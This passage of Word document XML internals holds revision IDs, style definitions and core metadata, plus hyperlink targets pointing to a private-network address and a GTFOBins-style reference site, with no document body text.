    <w:rsid w:val="00E16FB5"/>
    <w:rsid w:val="00E20356"/>
    <w:rsid w:val="00E214EE"/>
    <w:rsid w:val="00E25C30"/>
    <w:rsid w:val="00E301F1"/>
    <w:rsid w:val="00E3085B"/>
    <w:rsid w:val="00E31408"/>
    <w:rsid w:val="00E33439"/>
    <w:rsid w:val="00E3469A"/>
    <w:rsid w:val="00E34FDC"/>
    <w:rsid w:val="00E4402D"/>
    <w:rsid w:val="00E44D07"/>
    <w:rsid w:val="00E4521D"/>
    <w:rsid w:val="00E4536A"/>
    <w:rsid w:val="00E477D1"/>
    <w:rsid w:val="00E501D1"/>
    <w:rsid w:val="00E5056A"/>
    <w:rsid w:val="00E53F88"/>
    <w:rsid w:val="00E54329"/>
    <w:rsid w:val="00E565E7"/>
    <w:rsid w:val="00E56A58"/>
    <w:rsid w:val="00E66DC2"/>
    <w:rsid w:val="00E70853"/>
    <w:rsid w:val="00E70CD5"/>
    <w:rsid w:val="00E72E78"/>
    <w:rsid w:val="00E743E9"/>
    <w:rsid w:val="00E80199"/>
    <w:rsid w:val="00E84469"/>
    <w:rsid w:val="00E856F6"/>
    <w:rsid w:val="00E85D27"/>
    <w:rsid w:val="00E92BBA"/>
    <w:rsid w:val="00E937F4"/>
    <w:rsid w:val="00EA2CF7"/>
    <w:rsid w:val="00EA3CAF"/>
    <w:rsid w:val="00EA5AAA"/>
    <w:rsid w:val="00EB0065"/>
    <w:rsid w:val="00EB2667"/>
    <w:rsid w:val="00EB32A2"/>
    <w:rsid w:val="00EB4A13"/>
    <w:rsid w:val="00EB5B2F"/>
    <w:rsid w:val="00EC1AF1"/>
    <w:rsid w:val="00EC6406"/>
    <w:rsid w:val="00ED2F3B"/>
    <w:rsid w:val="00ED3040"/>
    <w:rsid w:val="00ED3C18"/>
    <w:rsid w:val="00EE032C"/>
    <w:rsid w:val="00EE0811"/>
    <w:rsid w:val="00EE0B26"/>
    <w:rsid w:val="00EE1D79"/>
    <w:rsid w:val="00EE6BFB"/>
    <w:rsid w:val="00EF026B"/>
    <w:rsid w:val="00EF0B7D"/>
    <w:rsid w:val="00EF17B4"/>
    <w:rsid w:val="00EF27B4"/>
    <w:rsid w:val="00F00A90"/>
    <w:rsid w:val="00F015EB"/>
    <w:rsid w:val="00F04E0E"/>
    <w:rsid w:val="00F06E7B"/>
    <w:rsid w:val="00F10CE1"/>
    <w:rsid w:val="00F11DA5"/>
    <w:rsid w:val="00F12D5A"/>
    <w:rsid w:val="00F15DA8"/>
    <w:rsid w:val="00F17EB1"/>
    <w:rsid w:val="00F217B8"/>
    <w:rsid w:val="00F22638"/>
    <w:rsid w:val="00F23225"/>
    <w:rsid w:val="00F250BD"/>
    <w:rsid w:val="00F31E1F"/>
    <w:rsid w:val="00F32C1C"/>
    <w:rsid w:val="00F32E56"/>
    <w:rsid w:val="00F3503F"/>
    <w:rsid w:val="00F35C0E"/>
    <w:rsid w:val="00F4653D"/>
    <w:rsid w:val="00F50029"/>
    <w:rsid w:val="00F50AF9"/>
    <w:rsid w:val="00F51D3B"/>
    <w:rsid w:val="00F52091"/>
    <w:rsid w:val="00F52604"/>
    <w:rsid w:val="00F528C6"/>
    <w:rsid w:val="00F53D36"/>
    <w:rsid w:val="00F55C06"/>
    <w:rsid w:val="00F601F4"/>
    <w:rsid w:val="00F64C8C"/>
    <w:rsid w:val="00F70491"/>
    <w:rsid w:val="00F7049B"/>
    <w:rsid w:val="00F74A02"/>
    <w:rsid w:val="00F74E19"/>
    <w:rsid w:val="00F75296"/>
    <w:rsid w:val="00F807F2"/>
    <w:rsid w:val="00F8190B"/>
    <w:rsid w:val="00F84AA5"/>
    <w:rsid w:val="00F87F59"/>
    <w:rsid w:val="00F90174"/>
    <w:rsid w:val="00F92880"/>
    <w:rsid w:val="00FA192E"/>
    <w:rsid w:val="00FA1ECD"/>
    <w:rsid w:val="00FA4CED"/>
    <w:rsid w:val="00FA53C0"/>
    <w:rsid w:val="00FB0AE1"/>
    <w:rsid w:val="00FB19F2"/>
    <w:rsid w:val="00FB22EF"/>
    <w:rsid w:val="00FB3233"/>
    <w:rsid w:val="00FB34F3"/>
    <w:rsid w:val="00FB3EBE"/>
    <w:rsid w:val="00FB4B35"/>
    <w:rsid w:val="00FB59CB"/>
    <w:rsid w:val="00FB64F8"/>
    <w:rsid w:val="00FB7D10"/>
    <w:rsid w:val="00FC0ECD"/>
    <w:rsid w:val="00FD0090"/>
    <w:rsid w:val="00FD172A"/>
    <w:rsid w:val="00FD3E64"/>
    <w:rsid w:val="00FD6BEE"/>
    <w:rsid w:val="00FE285D"/>
    <w:rsid w:val="00FE499A"/>
    <w:rsid w:val="00FE5ABA"/>
    <w:rsid w:val="00FF2EDA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B5B9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4DC24040-F68D-4EC5-AB38-3C49F7B4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1D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D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1D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D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DA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DA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DA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DA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1D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11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11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11D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1DA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11D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11D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11D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11D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11D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11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1D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11D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1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11D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1D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1D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1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11D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11DA5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A96360"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:textAlignment w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cstheme="majorBidi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227B3B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227B3B"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af1">
    <w:name w:val="批注文字 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af0"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00227B3B"/>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af2">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af3"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006D752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6D752A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6D75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6D752A"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af6">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B757E4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B757E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627C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627C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mailto:adriana@192.168.6.173" TargetMode="External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tfobins.github.io/#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adriana@192.168.6.173" TargetMode="External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495A-03F9-4AD6-A9D1-793FBC85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7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ha</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Aloha</cp:lastModifiedBy>
  <cp:revision>486</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-15T08:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-25T02:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>